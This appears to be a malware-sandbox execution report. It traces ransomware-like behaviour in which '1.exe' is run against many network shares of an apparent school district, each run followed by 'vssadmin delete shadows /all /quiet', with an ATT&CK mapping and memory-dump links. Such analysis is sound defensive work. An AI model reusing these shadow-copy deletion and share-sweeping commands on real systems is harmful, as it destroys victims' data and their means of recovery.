PID:1416

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y28$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2140

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2040

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y29$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2172

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2584

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y30$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2188

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1280

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y31$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2208

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2400

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y32$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2224

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2056

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y33$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2244

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2744

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y34$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2256

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2108

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y35$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2276

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:636

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y36$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2288

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2648

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS9.IN.NPS.K12.MA.US\Y37$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2308

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:676

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NHS-FRONT-MP.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2324

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1044

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\D$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2368

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:1592

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2360

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2764

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NES3020BOYSLCKR.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2352

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:436

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISROOM140DESK.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2344

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2272

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISROOM113.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2336

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2440

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\StaffHome" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2392

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
PID:2776

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\DirectoryFolder" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2384

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2712

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NPS5.IN.NPS.K12.MA.US\transfers" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2448

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2924

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NESLAB25.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2548

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1340

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM04.IN.NPS.K12.MA.US\WinControlV2$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2540

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2456

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM04.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2532

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:1700

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NISBRANNIGAN.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2524

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2864

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NIS-TECH2018.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2516

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2668

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\E$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2508

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2940

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2500

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2992

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM12.IN.NPS.K12.MA.US\Backups" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2492

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:3016

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM02.IN.NPS.K12.MA.US\POSData" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2484

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:560

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\VM02.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\1.exe
1.exe -ep 10 -path "\\NIS-ROOM-111.IN.NPS.K12.MA.US\C$" -id 1Gg4jZmHQ8SPhNPqscb8DizKQiSbFUCL
2⤵
PID:2468

C:\Windows\SysWOW64\vssadmin.exe
delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:2704

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File Deletion

T1107

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

memory/292-64-0x0000000000000000-mapping.dmp

Download
memory/316-144-0x0000000000000000-mapping.dmp

Download
memory/332-116-0x0000000000000000-mapping.dmp

Download
memory/364-110-0x0000000000000000-mapping.dmp

Download
memory/436-71-0x0000000000000000-mapping.dmp

Download
memory/524-54-0x0000000000000000-mapping.dmp

Download
memory/576-114-0x0000000000000000-mapping.dmp

Download
memory/648-106-0x0000000000000000-mapping.dmp

Download
memory/684-121-0x0000000000000000-mapping.dmp

Download
memory/748-99-0x0000000000000000-mapping.dmp

Download
memory/760-124-0x0000000000000000-mapping.dmp

Download
memory/772-76-0x0000000000000000-mapping.dmp

Download
memory/880-60-0x0000000000000000-mapping.dmp

Download
memory/888-142-0x0000000000000000-mapping.dmp

Download
memory/908-68-0x0000000000000000-mapping.dmp

Download
memory/944-79-0x0000000000000000-mapping.dmp

Download
memory/956-135-0x0000000000000000-mapping.dmp

Download
memory/964-131-0x0000000000000000-mapping.dmp

Download
memory/1044-56-0x0000000000000000-mapping.dmp

Download
memory/1048-128-0x0000000000000000-mapping.dmp

Download
memory/1056-139-0x0000000000000000-mapping.dmp

Download
memory/1132-81-0x0000000000000000-mapping.dmp

Download
memory/1184-100-0x0000000000000000-mapping.dmp

Download
memory/1212-107-0x0000000000000000-mapping.dmp

Download
memory/1252-101-0x0000000000000000-mapping.dmp

Download
memory/1268-87-0x0000000000000000-mapping.dmp

Download
memory/1340-72-0x0000000000000000-mapping.dmp

Download
memory/1440-109-0x0000000000000000-mapping.dmp

Download
memory/1448-88-0x0000000000000000-mapping.dmp

Download
memory/1480-57-0x0000000000000000-mapping.dmp

Download
memory/1488-58-0x00000000760A1000-0x00000000760A3000-memory.dmp

Filesize
8KB

Download
memory/1488-55-0x0000000000000000-mapping.dmp

Download
memory/1500-113-0x0000000000000000-mapping.dmp

Download
memory/1520-91-0x0000000000000000-mapping.dmp

Download
memory/1572-134-0x0000000000000000-mapping.dmp

Download
memory/1588-120-0x0000000000000000-mapping.dmp

Download
memory/1600-117-0x0000000000000000-mapping.dmp

Download
memory/1632-83-0x0000000000000000-mapping.dmp

Download
memory/1676-96-0x0000000000000000-mapping.dmp

Download
memory/1700-63-0x0000000000000000-mapping.dmp

Download
memory/1704-84-0x0000000000000000-mapping.dmp

Download
memory/1736-75-0x0000000000000000-mapping.dmp

Download
memory/1748-92-0x0000000000000000-mapping.dmp

Download
memory/1876-103-0x0000000000000000-mapping.dmp

Download
memory/1916-141-0x0000000000000000-mapping.dmp

Download
memory/1920-67-0x0000000000000000-mapping.dmp

Download
memory/1936-94-0x0000000000000000-mapping.dmp

Download
memory/1968-127-0x0000000000000000-mapping.dmp

Download
memory/1980-145-0x0000000000000000-mapping.dmp

Download
memory/2012-130-0x0000000000000000-mapping.dmp

Download
memory/2024-102-0x0000000000000000-mapping.dmp

Download
memory/2068-148-0x0000000000000000-mapping.dmp

Download
memory/2100-151-0x0000000000000000-mapping.dmp

Download
memory/2116-153-0x0000000000000000-mapping.dmp

Download
memory/2128-154-0x0000000000000000-mapping.dmp

Download
memory/2140-155-0x0000000000000000-mapping.dmp

Download
memory/2172-158-0x0000000000000000-mapping.dmp

Download
memory/2188-159-0x0000000000000000-mapping.dmp

Download
memory/2208-162-0x0000000000000000-mapping.dmp

Download
memory/2224-163-0x0000000000000000-mapping.dmp

Download
memory/2244-166-0x0000000000000000-mapping.dmp

Download
memory/2256-167-0x0000000000000000-mapping.dmp

Download
memory/2276-170-0x0000000000000000-mapping.dmp

Download
memory/2288-171-0x0000000000000000-mapping.dmp

Download
memory/2308-174-0x0000000000000000-mapping.dmp

Download